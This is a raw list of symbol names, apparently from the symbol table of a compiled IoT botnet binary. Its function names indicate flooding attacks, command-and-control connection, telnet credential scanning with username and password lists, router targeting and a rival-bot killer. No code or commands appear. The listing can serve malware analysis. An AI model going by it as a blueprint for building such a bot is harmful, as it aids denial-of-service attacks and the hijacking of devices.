_cs_funcs.c
fgets.c
fflush_unlocked.c
fgets_unlocked.c
strcmp.c
strncat.c
rawmemchr.c
strspn.c
strdup.c
ntop.c
inet_pton4
xdigits.3116
inet_ntop4
encodeh.c
decodeh.c
encodeq.c
lengthq.c
decodea.c
read_etc_hosts_r.c
llseek.c
tolower.c
fgetc_unlocked.c
strcasecmp.c
encoded.c
decoded.c
lengthd.c
_READ.c
_rfill.c
_trans2r.c
__fini_array_end
__fini_array_start
__init_array_end
__preinit_array_end
Degas are we not drawn onward no In union drawn onward to new eras aged
_GLOBAL_OFFSET_TABLE_
__init_array_start
__preinit_array_start
__read_etc_hosts_r
__GI_execve
__libc_sigaction
strcpy
__GI_fcntl64
recvLine
__GI_sigaddset
__socketcall
__GI___ctype_b
__GI_memchr
userID
__GI___glibc_strerror_r
waitpid
__open_nameservers
__GI_fopen
getrlimit
ioctl
_stdio_openlist_use_count
__GI_initstate_r
__GI_sigaction
strtok_r
__GI___C_ctype_toupper_data
__GI_time
getgid
sysconf
printf
stdout
random
__GI_strdup
__GI_getpagesize
getdtablesize
__GI_h_errno
contains_fail
__length_question
__GI___ctype_toupper
__GI_strcasecmp
__GI_tolower
recv
connect
__encode_question
__GI___uClibc_fini
numpids
__encode_header
__GI_strncat
sigemptyset
__pthread_mutex_lock
initConnection
__sigdelset
__GI_clock_getres
__uClibc_fini
memrchr
geteuid
inet_pton
__GI_snprintf
__GI_vsnprintf
__GI_setsid
memmove
sendTCP
__bsd_signal
snprintf
__GI_strpbrk
__stdio_trans2r_o
munmap
__GI_setsockopt
__libc_stack_end
__GI_fclose
__GI_wcsnrtombs
__GI_pipe
_uintmaxtostr
__libc_fcntl
atol
_h_errno
getc_unlocked
__ctype_b
__GI_random_r
usernames
errno
getegid
read_until_response
__GI_sbrk
zprintf
__GI___uClibc_init
execve
getpagesize
getpid
__GI_lseek64
setstate_r
fgets
getHost
__libc_getpid
wildString
__xpg_strerror_r
fcntl64
prctl
memcpy
makeRandomStr
__GI_fputs_unlocked
execl
__GI_fgets
sendHTTP
creat
_stdio_openlist_dec_use
sclose
__libc_select
_ppfs_init
__GI___C_ctype_toupper
__GI_fgetc_unlocked
__libc_nanosleep
trim
Dickranges
__GI_fgets_unlocked
dup2
__pthread_mutex_init
tolower
getuid
system
__open_etc_hosts
malloc
isatty
sleep
__GI_atol
vsnprintf
__dns_lookup
__GI_read
__C_ctype_tolower
random_r
__dso_handle
clock_getres
gethostbyname_r
tcpcsum
fdpclose
socket
__GI_dup2
select
_pthread_cleanup_pop_restore
__GI_wcrtomb
__GI___libc_fcntl
D1ckSuckaz
__GI_memset
isspace
__stdio_seek
mempcpy
__GI_strcoll
__GI_write
__ctype_toupper
__libc_read
_string_syserrmsgs
__GI_herror
__GI_open
__GI_strchr
__searchdomain
sigaddset
__GI_tcgetattr
__environ
mmap
wcsnrtombs
makeIPPacket
__GI_inet_ntoa
send
__fgetc_unlocked
abort
__GI_fcntl
__GI_wcsrtombs
__GI_fwrite_unlocked
__GI_getgid
srandom_r
_init
D1ckSucka
__GI_inet_ntoa_r
hostname_to_ip
__GI_setstate_r
parseHex
strtol
pipe
__libc_lseek64
strnlen
rawmemchr
__GI_mempcpy
__malloc_state
__GI___C_ctype_b_data
__sigaddset
nanosleep
__GI_send
h_errno
__pthread_mutex_unlock
wait4
__register_frame_info_bases
__GI_exit
__app_fini
csum
__exit_cleanup
__GI_execl
__GI_srandom_r
__GI___ctype_tolower
write
environ
__GI_close
getBuild
Server_Botport
fprintf
__resolv_lock
kill
fputs_unlocked
__pthread_mutex_trylock
__GI_brk
__GI_nanosleep
__GI_strtok
_stdio_openlist
__GI_sigprocmask
inet_addr
ntohl
__GI_fseek
ourIP
chdir
fseeko
_stdio_openlist_del_count
connectTimeout
Tacocat
__raise
setsockopt
bsd_signal
fseek
__GI_kill
__GI_strcmp
__GI_memmove
sendSTD
setstate
__decode_dotted
__stdio_READ
memchr
__GI_toupper
__pthread_initialize_minimal
__GI_recv
__stdin
stdin
__GI_isatty
ngPid
strcasestr
_start
__deregister_frame_info_bases
strstr
__GI_ioctl
init_rand
rand
signal
read
__decode_header
getCores
__GI___h_errno_location
__GI_memcpy
strcoll
StartTheNetis
wcsrtombs
_stdio_user_locking
strncpy
strcasecmp
htonl
RemoveTMP
sendto
__C_ctype_toupper
StartTheLelz
__GI___C_ctype_b
HackerScan2
__GI_gethostbyname_r
__GI_strncpy
__libc_send
__GI___xpg_strerror_r
__GI___C_ctype_tolower
__GI_getrlimit
bcopy
__GI_strcpy
__GI_inet_ntop
strtok
__stdio_adjust_position
malloc_trim
__GI_poll
_vfprintf_internal
__GI_strcasestr
fork
__stdio_rfill
strncat
__GI_sleep
sigaction
__GI_gethostbyname
_dl_phdr
__GI_getc_unlocked
__GI___libc_fcntl64
__uClibc_init
__GI_munmap
_store_inttype
__length_dotted
__getpagesize
__GI_random
__syscall_error
__uclibc_progname
__GI_getegid
__GI_wait4
__malloc_lock
__uClibc_main
sbrk
__rtld_fini
__GI_fork
strdup
__libc_close
__GI_getpid
inet_aton
index
_pthread_cleanup_push_defer
processCmd
__sigismember
fopen
__bss_start
__libc_open
getOurIP
get_telstate_host
memset
__GI_socket
main
__glibc_strerror_r
listFork
__GI___C_ctype_tolower_data
__stdio_fwrite
negotiate
srand
initstate
fclose
__syscall_rt_sigaction
ntohs
sendUDP
inet_ntoa
tcgetattr
__C_ctype_tolower_data
time
__libc_system
__GI_abort
poll
fdpopen
__GI_fprintf
__get_hosts_byname_r
__stdio_init_mutex
__GI__exit
botkiller
herror
strcmp
advances2
__nameserver
data_start
HackerScan
__GI_sysconf
__h_errno_location
matchPrompt
__C_ctype_b_data
__GI_inet_pton
gethostbyname
_stdio_fopen
_fini
__GI_chdir
__vfork
__GI_mmap
contains_success
sprintf
fdgets
__get_pc_thunk_bx
strerror_r
__GI_select
__libc_waitpid
socket_connect
__GI_waitpid
_stdio_term
__GI_vfprintf
__decode_answer
__GI_signal
stderr
fails
vfork
__C_ctype_b
srandom
_ppfs_setargs
__GI_sendto
__GI_sigemptyset
__GI_printf
__libc_fork
__atexit_lock
scanPid
rand_cmwc
advances
__libc_fcntl64
getsockopt
__GI_fseeko64
hstrerror
fflush_unlocked
__stdio_wcommit
HackerPrint
contains_string
__GI___fgetc_unlocked
__nameservers
fwrite_unlocked
inet_ntoa_r
__pagesize
_stdio_openlist_add_lock
__GI_getdtablesize
access
_edata
__stdout
__GI_memrchr
__GI_fflush_unlocked
__GI_strstr
__searchdomains
_end
htons
_sigintr
_ppfs_prepargs
__GI_strspn
fgetc_unlocked
initstate_r
__GI_connect
__curbrk
__libc_poll
_dl_phnum
_fpmaxtostr
__errno_location
uppercase
_stdlib_strto_l
__GI___libc_open
exit
__stdio_WRITE
_stdio_init
__GI_geteuid
inet_ntop
hvgsgd
__C_ctype_toupper_data
_dl_aux_init
sendJUNK
_errno
atoi
successes
_stdio_openlist_del_lock
__GI_inet_aton
fgets_unlocked
_exit
szprintf
strspn
__libc_recv
LoopPayload
__libc_creat
strlen
lseek64
open
toupper
__libc_write
__malloc_consolidate
_ppfs_parsespec
__GI_strtol
__GI_getuid
__GI_strtok_r
hekkertelnet
__GI_errno
__libc_sendto
__stdio_trans2w_o
__GI_vfork
NetisRanges
strchr
__GI_rawmemchr
__GI_raise
__data_start
setsid
__GI_inet_addr
__encode_dotted
__GI_strnlen
_Jv_RegisterClasses
macAddress
__GI___errno_location
readUntil
fcntl
read_with_timeout
__GI_atoi
fseeko64
__GI_sprintf
__ctype_tolower
wcrtomb
__GI_getsockname
close
__libc_connect
passwords
__GI_strlen
sendHOLD
pids
sendCNC
vfprintf
strpbrk
getBogos
_load_inttype
raise
free
sigprocmask
getsockname
